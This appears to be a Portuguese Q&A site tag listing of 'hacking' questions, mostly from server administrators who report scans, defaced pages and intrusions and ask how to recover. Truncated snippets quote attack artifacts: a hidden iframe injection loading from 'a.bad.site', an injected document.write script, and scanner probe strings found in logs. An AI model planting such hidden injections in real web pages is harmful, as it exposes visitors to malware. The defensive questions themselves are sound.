Perguntas sobre 'hacking'

Perguntas sobre defesa ou recuperação de hackers mal-intencionados. Não oferecemos suporte a hackers, portanto, perguntas sobre a realização desses hacks não são permitidas aqui.
2
respostas

Servidor sendo verificado por determinados endereços IP

Eu notei linhas como essas no meu log do apache [Fri Oct 15 21:09:43 2010] [error] [client 216.205.76.228] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind:) Vindo dos seguintes ende...
16.10.2010 / 13:50
4
respostas

Windows Server 2003 hackeado - arquivos sendo carregados

Diretórios em branco estão sendo criados no meu servidor virtual Windows Server 2003 com subdiretórios estranhos (por exemplo: "88ÿ ÿ ÿÿþþ þþ13þ"). Parece que eles estão fazendo upload de DVDs piratas e softwares piratas. Toda a minha largura de...
03.04.2010 / 08:29
4
respostas

Site hackeado - alguma ideia do que fazer, onde procurar?

Um site que hospedei foi invadido recentemente. A página de índice tinha o seguinte código adicionado à parte inferior (logo acima da tag body de fechamento): <script language="javascript">document.write('<div style="font-family:T...
12.08.2010 / 19:58
2
respostas

Quão seguros são os arquivos hospedados no IIS de forma anônima com o Directory Browsing desabilitado?

Para elaborar um pouco sobre esse ponto, gostaria de saber a segurança dos documentos hospedados em um site do IIS com a seguinte configuração: Listagem de diretório do IIS desativado O acesso anônimo é ativado O site é acessado some...
15.06.2011 / 18:52
5
respostas

Meu servidor está sendo invadido? [duplicado]

Eu tenho essa página estranha, que eu tenho certeza que não foi criada por mim: <iframe src="http://a.bad.site:8080/ts/in.cgi?pepsi106"width=125height=125style="visibility: hidden"></iframe> De onde vem isso? Isso é um vír...
08.10.2009 / 09:48
3
respostas

Como hackear meu próprio servidor?

Olá, Estou usando o Windows Server 2008 R2, ontem eu notei que meu AD não estava funcionando adequadamente porque eu não consigo gerenciar usuários e o console mmc não me permite trabalhar com qualquer anúncio, consoles relativos ao DNS. Entã...
10.12.2009 / 15:25
2
respostas

ataque Arp na minha rede

Temos uma pequena rede de cerca de 100 portáteis / desktops e cerca de 20 servidores (soa um exagero, mas esses servidores também fornecem serviço para todos os nossos contratados externos) e notamos recentemente que nosso servidor CAS do Exchan...
23.09.2014 / 17:40
1
resposta

Antivírus antimalware para o servidor Web Linux? [fechadas]

Alguém tem experiência em executar um software antivírus em um servidor web Linux, especialmente o CentOS, e o que você recomendaria? Estou interessado em colocá-lo em um servidor da web que temos como mais um método para detectar e impedir comp...
23.07.2012 / 19:50
1
resposta

“GET / assets /)! == t && (e.html (e.data (HTTP / 1.1” 200 3538 “-” “Java / 1.7.0_25”

Estou vendo solicitações GET como: "GET /assets/)!==t&&(e.html(e.data( HTTP/1.1" 200 3538 "-" "Java/1.7.0_25" nos meus logs para uma caixa que hospeda um aplicativo Rails. Parece suspeitamente com alguém sondando o aplicativo, mas...
10.12.2013 / 13:47
3
respostas

Packet farejando um servidor web

Eu tenho um dever de casa no qual eu deveria explicar como eu iria invadir um servidor, recuperar um arquivo e cobrir minhas faixas. Minha principal questão: é possível ao pacote sniffar um servidor web remoto? Outras informações seriam aprec...
15.06.2010 / 23:34